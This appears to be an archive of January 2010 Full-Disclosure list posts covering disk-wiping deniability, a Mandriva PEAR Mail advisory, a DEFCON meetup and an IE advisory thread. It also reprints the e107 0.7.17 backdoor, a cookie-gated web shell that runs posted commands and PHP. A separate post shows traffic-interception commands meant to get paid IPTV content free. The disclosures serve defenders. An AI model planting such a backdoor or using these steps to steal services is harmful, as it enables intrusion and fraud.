On Mon, 25 Jan 2010 23:07:57 +0545, Bipin Gautam said: > It would be intellectual uphill challenge for the EXAMINERS given that > someone may have to shift 1 terabyte of data (how many bytes?:) mostly > by HUMAN RESOURCE in hope for a ___ in the haystack.. You *do* realize that there exist numerous tools to automate this scanning, so "human resource" means "select the search terms, hit enter, and check back after lunch". http://www.microsoft.com/industry/government/solutions/cofee/default.aspx http://www.guidancesoftware.com/computer-forensics-fraud-investigation-software.htm That's the sort of stuff your disk will most likely be hit with. The state of the art is stuff like "find all erased e-mail from X to Y regarding the McClellan situation". pgpvWbYJGlYSB.pgp Description: PGP signature ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Disk wiping -- An alternate approach?
Ok, i extract wikipedia in my computer... then latter delete the html... @hdd level the place is marked freespace. then i copy a few videos, write a few emails and by then if most of the things gets deleted and by bad luck if any such content is left unoverwritten partially producing "questionable" and "surprising" patterns UNKNOWINGLY of just a few phrases, then basically someone is screwed just like that, even without GUILT ?! So, copying dictionary, webpages, encyclopaedia, research paper etc in your computer can really be harmful sometimes !!!? Anything on the internet if its a webpage can land on anyones computer while browsing, searching online, following links and with a lot of coincidences etc AND NOT NECESSARILY whatever text chunks found in your hdd is content OF YOUR OWN. YOU READ TO BLOGS OF PEOPLE, VISIT FORUMS, joke around in FD etc... (get the idea) and it can be saved in disk cache and IF be leftover in disk as broken chunks of texts you are screwed ? How does law see all that. So, if a "questionable" content is found it doesnt mean the laptop owner is responsible for it. We even keep on skipping text while reading in forums online and anyone can say anything online and it can land in your hdd as TROJAN HORSE of OPINIONS to screw you latter in life !!!? Think about it? Maybe then Alice/chatterbox run through the free/slack/etc... space of your harddisk idea is better? It would be intellectual uphill challenge for the EXAMINERS given that someone may have to shift 1 terabyte of data (how many bytes?:) mostly by HUMAN RESOURCE in hope for a ___ in the haystack.. bty, how many BOOKS is that? :P -bipin [1] http://alice.pandorabots.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [ MDVSA-2010:025 ] php-pear-Mail
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 ___ Mandriva Linux Security Advisory MDVSA-2010:025 http://www.mandriva.com/security/ ___ Package : php-pear-Mail Date: January 25, 2010 Affected: 2008.0, 2009.0, 2009.1, 2010.0, Corporate 4.0, Enterprise Server 5.0 ___ Problem Description: Multiple vulnerabilities were discovered and corrected in php-pear (Mail): Argument injection vulnerability in the sendmail implementation of the Mail::Send method (Mail/sendmail.php) in the Mail package 1.1.14 for PEAR allows remote attackers to read and write arbitrary files via a crafted parameter, a different vector than CVE-2009-4111 (CVE-2009-4023). Argument injection vulnerability in Mail/sendmail.php in the Mail package 1.1.14, 1.2.0b2, and possibly other versions for PEAR allows remote attackers to read and write arbitrary files via a crafted parameter, and possibly other parameters, a different vulnerability than CVE-2009-4023 (CVE-2009-4111). Packages for 2008.0 are provided for Corporate Desktop 2008.0 customers. The updated packages have been patched to correct these issues. ___ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-4023 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-4111 ___ Updated Packages: Mandriva Linux 2008.0: 943289b9ea09700ecaf5512c50d380d3 2008.0/i586/php-pear-5.2.4-1.1mdv2008.0.noarch.rpm f77090cf65f4ade44835a112d4fc67e0 2008.0/SRPMS/php-pear-5.2.4-1.1mdv2008.0.src.rpm Mandriva Linux 2008.0/X86_64: bfd61ade59779825fa62126c05f5967a 2008.0/x86_64/php-pear-5.2.4-1.1mdv2008.0.noarch.rpm f77090cf65f4ade44835a112d4fc67e0 2008.0/SRPMS/php-pear-5.2.4-1.1mdv2008.0.src.rpm Mandriva Linux 2009.0: aacca8d19653ea6a82a248f604abbd0b 2009.0/i586/php-pear-5.2.6-6.1mdv2009.0.noarch.rpm 9468e00db376dab4664d665377b79fca 2009.0/SRPMS/php-pear-5.2.6-6.1mdv2009.0.src.rpm Mandriva Linux 2009.0/X86_64: 202b8122c1ec7ef90f0355f99b3c7686 2009.0/x86_64/php-pear-5.2.6-6.1mdv2009.0.noarch.rpm 9468e00db376dab4664d665377b79fca 2009.0/SRPMS/php-pear-5.2.6-6.1mdv2009.0.src.rpm Mandriva Linux 2009.1: 2e2ae9f59bc3ac527362b5c0776236fe 2009.1/i586/php-pear-5.2.9-1.1mdv2009.1.noarch.rpm 82b814b71169f985b1b977ba60d5bd59 2009.1/SRPMS/php-pear-5.2.9-1.1mdv2009.1.src.rpm Mandriva Linux 2009.1/X86_64: 0115517a560174cac95a19cbd17ed745 2009.1/x86_64/php-pear-5.2.9-1.1mdv2009.1.noarch.rpm 82b814b71169f985b1b977ba60d5bd59 2009.1/SRPMS/php-pear-5.2.9-1.1mdv2009.1.src.rpm Mandriva Linux 2010.0: 6f42b2e519d40d7fa304a3dc451c1c58 2010.0/i586/php-pear-Mail-1.2.0-0.b1.2.1mdv2010.0.noarch.rpm 7bb574ae5c1660a3a0cd5a2deff3586f 2010.0/SRPMS/php-pear-Mail-1.2.0-0.b1.2.1mdv2010.0.src.rpm Mandriva Linux 2010.0/X86_64: f7401a8fdd2b526c806532fcb75271e3 2010.0/x86_64/php-pear-Mail-1.2.0-0.b1.2.1mdv2010.0.noarch.rpm 7bb574ae5c1660a3a0cd5a2deff3586f 2010.0/SRPMS/php-pear-Mail-1.2.0-0.b1.2.1mdv2010.0.src.rpm Corporate 4.0: a948abe7ef93f8e60f91d52f5e0aaee4 corporate/4.0/i586/php-pear-5.1.4-3.2.20060mlcs4.noarch.rpm d8fca1fee69801c2b0c3de51fcb8ba8d corporate/4.0/SRPMS/php-pear-5.1.4-3.2.20060mlcs4.src.rpm Corporate 4.0/X86_64: 3f1684a400312f5912cc80e235c083ec corporate/4.0/x86_64/php-pear-5.1.4-3.2.20060mlcs4.noarch.rpm d8fca1fee69801c2b0c3de51fcb8ba8d corporate/4.0/SRPMS/php-pear-5.1.4-3.2.20060mlcs4.src.rpm Mandriva Enterprise Server 5: 6bdc54b90afd9bea13d663c76efe9c3e mes5/i586/php-pear-5.2.6-6.1mdvmes5.noarch.rpm 4bb9c64b927033aa2125a7893f29e943 mes5/SRPMS/php-pear-5.2.6-6.1mdvmes5.src.rpm Mandriva Enterprise Server 5/X86_64: 419935609521cbfc30b4161e483bdd13 mes5/x86_64/php-pear-5.2.6-6.1mdvmes5.noarch.rpm 4bb9c64b927033aa2125a7893f29e943 mes5/SRPMS/php-pear-5.2.6-6.1mdvmes5.src.rpm ___ To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing: gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98 You can view other update advisories for Mandriva Linux at: http://www.mandriva.com/security/advisories If you want to report vulnerabilities, please contact security_(at)_mandriva.com ___ Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Mandriva Security Team -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.9 (GNU/Linux) iD8D
Re: [Full-disclosure] Disk wiping -- An alternate approach?
> - The absence of evidence 9 times out of 10 is just as bad as the > evidence itself in court. > In what court? > - What you type text or email can, and will, be used against you in a > court of law. > Only if obtained by correct process of law and you resist the temptation to "explain yourself" to the police. > So, plausible deniability solution for disk wiping?: > > Let, disk wiping tools LOAD the whole WIKIPEDIA in nxn matrices and > mix ALL the words & phrases in a random pool continuously and use THIS > as the "Wiping passes and patterns" while they wipe the disk-space > (instead of using random-pass or zero) You're forgetting that you aren't required to explain yourself in court (5th Ammendment). It's the job of the prosecution to connect the dots and prove you're guilty. Smart defendants hire their own expert to refute the testimony of of the prosecution's "expert". As to Wikipedia, I think a random overwrite pattern would be way better than them finding fragments of the following (just two examples) : http://en.wikipedia.org/wiki/Nuclear_weapon_design http://en.wikipedia.org/wiki/Child_prostitution Practically every illegal act has an article on Wikipedia .. why deliberately "seed" your hard disk with them? Cheers, Michael Holstein Cleveland State University ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] London DEFCON January meet - DC4420 - Wed 27th Jan 2010
Hi All, It's a new year, and we have a new venue and new rules of engagement! First, the venue - we are back in a pub, in the heart of the west end, with a private room/bar and easy connection to mainline stations etc. Food is excellent and drinks are at *normal* pub prices (and, most importantly, they have Guinness) Secondly, ROE: we still run on "Fight Club" rules, i.e. "you will talk", but we're going to make it a bit easier to get started... This year, we will be limiting the talks to a single full-length 'tek/security/hacking' talk, followed by a single 'fun/other' talk, which can be any length (if it's really short, we may do two that month)... Some previous subjects for the 'fun' talks have been: Torches / Lasers Home built water cannon Interfacing live firearms to FPS games Brain engineering (smart drugs etc.) ... you get the idea... Meeting will always be the last Wednesday of the month, and venue is booked for the whole year, so you can get these dates in your diary (they are also on the front page of the main site - http://www.dc4420.org/) January 27th Febuary 24th March 31st April 28th - Infosec *gulp* May 26th June 30th July 28th (Social - goons will be in Vegas!) August 25th September 29th October 27th November 24th December 15th (Social) <-- Not a Wednesday! OK, so on to this month's details: venue: Upstairs at The Black Horse, 6 Rathbone Place, W1T 1HH http://tinyurl.com/dc4420-venue nearest stations: Tottenham Court Road London Underground station (150m) - zone 1 Goodge Street London Underground station (440m) - zone 1 Oxford Circus London Underground station (630m) - zone 1 Leicester Square London Underground station (680m) - zone 1 Covent Garden London Underground station (750m) - zone 1 talks: - mu-b : disk crypto stuff (the technical one) - even + others : white hat rally (the non-technical one) as mu-b may be late, and the rally talk may be quite short, we will also have: - Bonus: Major Malfunction will show the latest build of http://www.alcrypto.co.uk/satmap/ (the fun one) yes, me hunting for UAVs... :P kickoff: room ours from 18:00, talks start at 19:30 kitchen closes at 21:00 last orders 23:00 see you all there! http://dc4420.org cheers, MM -- "In DEFCON, we have no names..." errr... well, we do... but silly ones... ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Disk wiping -- An alternate approach?
hahaha! Ok, let a Alice/chatterbox run through your harddisk! :P [1] http://alice.pandorabots.com/ On 1/25/10, valdis.kletni...@vt.edu wrote: > On Mon, 25 Jan 2010 01:09:40 +0545, Bipin Gautam said: > >> So, plausible deniability solution for disk wiping?: >> >> Let, disk wiping tools LOAD the whole WIKIPEDIA in nxn matrices and >> mix ALL the words & phrases in a random pool continuously and use THIS >> as the "Wiping passes and patterns" while they wipe the disk-space >> (instead of using random-pass or zero) and let the people who dont >> need-to-know make sense of whatever they want to pull up from the >> 'patterns' generated from the ENCYCLOPEDIA OF KNOWLEDGE & unlimited >> keywords and phrases and counter the same? > > The problem is that although using Markov chains to generate pseudo-random > text, it's usually pretty obviously pseudo-random text. And in fact, they're > usually so random that it's pretty obvious it's just random words and > doesn't > prove anything more or less than acres of zeros. > > http://en.wikipedia.org/wiki/Dissociated_press > > The problem is that every once in a while, those things actually generate > short chunks of intelligible text (especially when using a longer chain > length). So now, instead of being able to say to the district attorney > > "The disk was full of zeros, and you can't prove what was on it before". > > you're now saying to him: > > "What do you mean, you found the phrase 'Drop the cocaine and kiddie porn > off > at my place around 9PM' on block 239349 of my hard drive?" > > Generally a bad idea. > ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] e107 latest download link is backdoored
Hi guys, The latest version of e107, version 0.7.17 contains a PHP backdoor. http://e107.org/e107_files/downloads/e107_v0.7.17_full.zip I've just downloaded this file and while looking through the code, I've found the following piece of code: file: class2.php, line: 1876 if(md5($_COOKIE['access-admin']) == "cf1afec15669cb96f09befb7d70f8bcb") { ... if(!empty($_POST['cmd'])){ $out = execute($_POST['cmd']); } elseif(!empty($_POST['php'])){ ob_start(); eval($_POST['php']); $out = ob_get_contents(); ob_end_clean(); } ... and so on. I've informed the e107 guys about this situation. For now, that link is not safe. Look at the file date, class2.php has been modified on 2010-01-23, 21:52:26 -- Bogdan Calin - bog...@acunetix.com CTO Acunetix Ltd. - http://www.acunetix.com Acunetix Web Security Blog - http://www.acunetix.com/blog ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Question about IPTV pentestng - packet manipulation for subscribing charged content
Hello list. 2010.1.14, I sent to list Below e-mail. So someone gave me information. about netsed http://lcamtuf.coredump.cx/soft/netsed.tgz It was a tool which I want Structure) Monitor - IPTV STB - PC(attacker) - VDSL modem - internet PC have two NIC. Bridge mode. Ex) ifconfig eth0 0.0.0.0 Ifconfig eth1 0.0.0.0 Brctl addbr br0 Brctl addif br0 eth0 Brctl addif br0 eth1 Ifconfig br0 up And then run tcpdump bash# tcpdump -n -i eth0 ... (lots of funny stuff) ... bash# tcpdump -n -i eth1 ... (lots of funny stuff) And I could watch IPTV normally. Netsed have a localport. So if packet is sent localport, netsed will edit this packet and forward. Bash# netsed tcp 1 0 0 s/abc/def Protocol localport remoteIP rPort rule For IPTV packet forwarding to netsed’s localport, run these command. bash# ebtables -t broute -A BROUTING -p IPv4 --ip-protocol 6 \ --ip-destination-port 80 -j redirect --redirect-target ACCEPT bash# iptables -t nat -A PREROUTING -i br0 -p tcp --dport 80 \ -j REDIRECT --to-port 1 Because IPTV is on bridge network, I use ebtables and iptables. Finally, when IPTV want to look for VoD list, it send http packet. But netsed cannot receive forwarded packet. So I cannot watch VoD list. All of this is to subscribe charged content. What was wrong? Hello list. I’m pen testing IPTV. Example) Monitor - IPTV STB - PC(attacker) - VDSL modem - internet PC has two NIC Two NIC are bridge mode IPTV STB sends request packet for knowing that where is specific file for playing. To server port 8080. POST /VoD/whereisvod.cgi a1d1.mpg Server’s response is HTTP/1.1 200 OK 192.168.10.10 And then IPTV STB sends RTSP packet to 192.168.10.10. To server port 554 DESCRIBE a1d1.mpg And play. I wanna edit this file name. (a1d1.mpg is free, a1d2.mpg not free) POST /VoD/whereisvod.cgi a1d2.mpg DESCRIBE a1d2.mpg For this, I have to packet sniffing and blocking them and manipulation packet and resend. Are there tools? ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] ZDI-10-011: Microsoft Internet Explorer Table Layout Col Tag Cache Update Remote Code Execution Vulnerability
"I just discovered a major flaw which affects all operating systems ever made, but I'm not saying where it is. I could get into your PC in seconds if I want to." -- Malory the non-FD hacker On Mon, Jan 25, 2010 at 10:28 AM, Berend-Jan Wever wrote: > How about rebranding to ZID, as in Zero Information Disclosures? > > > Berend-Jan Wever > http://skypher.com/SkyLined > > > > > On Thu, Jan 21, 2010 at 9:07 PM, ZDI Disclosures < > zdi-disclosu...@tippingpoint.com> wrote: > >> ZDI-10-011: Microsoft Internet Explorer Table Layout Col Tag Cache Update >> Remote Code Execution Vulnerability >> http://www.zerodayinitiative.com/advisories/ZDI-10-011 >> January 21, 2010 >> >> -- CVE ID: >> CVE-2010-0244 >> >> -- Affected Vendors: >> Microsoft >> >> -- Affected Products: >> Microsoft Internet Explorer >> >> -- Vulnerability Details: >> This vulnerability allows remote attackers to execute arbitrary code on >> vulnerable installations of Microsoft Internet Explorer. User >> interaction is required to exploit this vulnerability in that the target >> must visit a malicious page. >> >> The specific flaw exists when a Col element is used within an HTML table >> container. If this element is removed while the table is in use a cache >> that exists of the table's cells will be used after one of it's elements >> has been invalidated. This can lead to code execution under the context >> of the currently logged in user. >> >> -- Vendor Response: >> Microsoft has issued an update to correct this vulnerability. More >> details can be found at: >> >> http://www.microsoft.com/technet/security/Bulletin/MS10-jan.mspx >> >> -- Disclosure Timeline: >> 2009-07-14 - Vulnerability reported to vendor >> 2010-01-21 - Coordinated public release of advisory >> >> -- Credit: >> This vulnerability was discovered by: >>* wushi of team509 >> >> -- About the Zero Day Initiative (ZDI): >> Established by TippingPoint, The Zero Day Initiative (ZDI) represents >> a best-of-breed model for rewarding security researchers for responsibly >> disclosing discovered vulnerabilities. >> >> Researchers interested in getting paid for their security research >> through the ZDI can find more information and sign-up at: >> >>http://www.zerodayinitiative.com >> >> The ZDI is unique in how the acquired vulnerability information is >> used. TippingPoint does not re-sell the vulnerability details or any >> exploit code. Instead, upon notifying the affected product vendor, >> TippingPoint provides its customers with zero day protection through >> its intrusion prevention technology. Explicit details regarding the >> specifics of the vulnerability are not exposed to any parties until >> an official vendor patch is publicly available. Furthermore, with the >> altruistic aim of helping to secure a broader user base, TippingPoint >> provides this vulnerability information confidentially to security >> vendors (including competitors) who have a vulnerability protection or >> mitigation product. >> >> Our vulnerability disclosure policy is available online at: >> >>http://www.zerodayinitiative.com/advisories/disclosure_policy/ >> ___ >> Full-Disclosure - We believe in it. >> Charter: http://lists.grok.org.uk/full-disclosure-charter.html >> Hosted and sponsored by Secunia - http://secunia.com/ >> > > > ___ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] ZDI-10-011: Microsoft Internet Explorer Table Layout Col Tag Cache Update Remote Code Execution Vulnerability
How about rebranding to ZID, as in Zero Information Disclosures? Berend-Jan Wever http://skypher.com/SkyLined On Thu, Jan 21, 2010 at 9:07 PM, ZDI Disclosures < zdi-disclosu...@tippingpoint.com> wrote: > ZDI-10-011: Microsoft Internet Explorer Table Layout Col Tag Cache Update > Remote Code Execution Vulnerability > http://www.zerodayinitiative.com/advisories/ZDI-10-011 > January 21, 2010 > > -- CVE ID: > CVE-2010-0244 > > -- Affected Vendors: > Microsoft > > -- Affected Products: > Microsoft Internet Explorer > > -- Vulnerability Details: > This vulnerability allows remote attackers to execute arbitrary code on > vulnerable installations of Microsoft Internet Explorer. User > interaction is required to exploit this vulnerability in that the target > must visit a malicious page. > > The specific flaw exists when a Col element is used within an HTML table > container. If this element is removed while the table is in use a cache > that exists of the table's cells will be used after one of it's elements > has been invalidated. This can lead to code execution under the context > of the currently logged in user. > > -- Vendor Response: > Microsoft has issued an update to correct this vulnerability. More > details can be found at: > > http://www.microsoft.com/technet/security/Bulletin/MS10-jan.mspx > > -- Disclosure Timeline: > 2009-07-14 - Vulnerability reported to vendor > 2010-01-21 - Coordinated public release of advisory > > -- Credit: > This vulnerability was discovered by: >* wushi of team509 > > -- About the Zero Day Initiative (ZDI): > Established by TippingPoint, The Zero Day Initiative (ZDI) represents > a best-of-breed model for rewarding security researchers for responsibly > disclosing discovered vulnerabilities. > > Researchers interested in getting paid for their security research > through the ZDI can find more information and sign-up at: > >http://www.zerodayinitiative.com > > The ZDI is unique in how the acquired vulnerability information is > used. TippingPoint does not re-sell the vulnerability details or any > exploit code. Instead, upon notifying the affected product vendor, > TippingPoint provides its customers with zero day protection through > its intrusion prevention technology. Explicit details regarding the > specifics of the vulnerability are not exposed to any parties until > an official vendor patch is publicly available. Furthermore, with the > altruistic aim of helping to secure a broader user base, TippingPoint > provides this vulnerability information confidentially to security > vendors (including competitors) who have a vulnerability protection or > mitigation product. > > Our vulnerability disclosure policy is available online at: > >http://www.zerodayinitiative.com/advisories/disclosure_policy/ > ___ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/